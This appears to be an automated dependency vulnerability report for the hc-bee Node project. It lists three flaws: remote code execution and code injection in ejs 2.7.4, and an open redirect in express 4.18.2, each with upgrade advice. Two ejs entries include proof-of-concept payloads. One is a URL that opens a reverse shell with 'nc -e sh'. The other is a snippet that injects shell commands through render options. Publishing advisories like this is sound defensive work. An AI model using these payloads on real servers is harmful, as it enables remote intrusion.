Vulnerabilities

 3 via 3 paths

Dependencies

 104

Source

 GitHub

Commit

 d1f46790

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
  • 2
Status
  • 3
  • 0
  • 0

high severity

Remote Code Execution (RCE)

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.7.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.

Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.

PoC:

Creation of reverse shell:

http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s

Remediation

Upgrade ejs to version 3.1.7 or higher.

References

Remote Code Execution (RCE) vulnerability report

medium severity
new

Open Redirect

  • Vulnerable module: express
  • Introduced through: express@4.18.2

Detailed paths

  • Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 express@4.18.2
    Remediation: Upgrade to express@4.19.2.

Overview

express is a minimalist web framework.

Affected versions of this package are vulnerable to Open Redirect due to the implementation of URL encoding using encodeurl before passing it to the location header. This can lead to unexpected evaluations of malformed URLs by common redirect allow list implementations in applications, allowing an attacker to bypass a properly implemented allow list and redirect users to malicious sites.

Remediation

Upgrade express to version 4.19.2, 5.0.0-beta.3 or higher.

References

Open Redirect vulnerability report

medium severity

Arbitrary Code Injection

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.6.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile. If external input is flowing into the options parameter, an attacker is able run arbitrary code. This include the filename, compileDebug, and client option.

POC

let ejs = require('ejs')
ejs.render('./views/test.ejs',{
    filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
    compileDebug: true,
    message: 'test',
    client: true
})

Remediation

Upgrade ejs to version 3.1.6 or higher.

References

Arbitrary Code Injection vulnerability report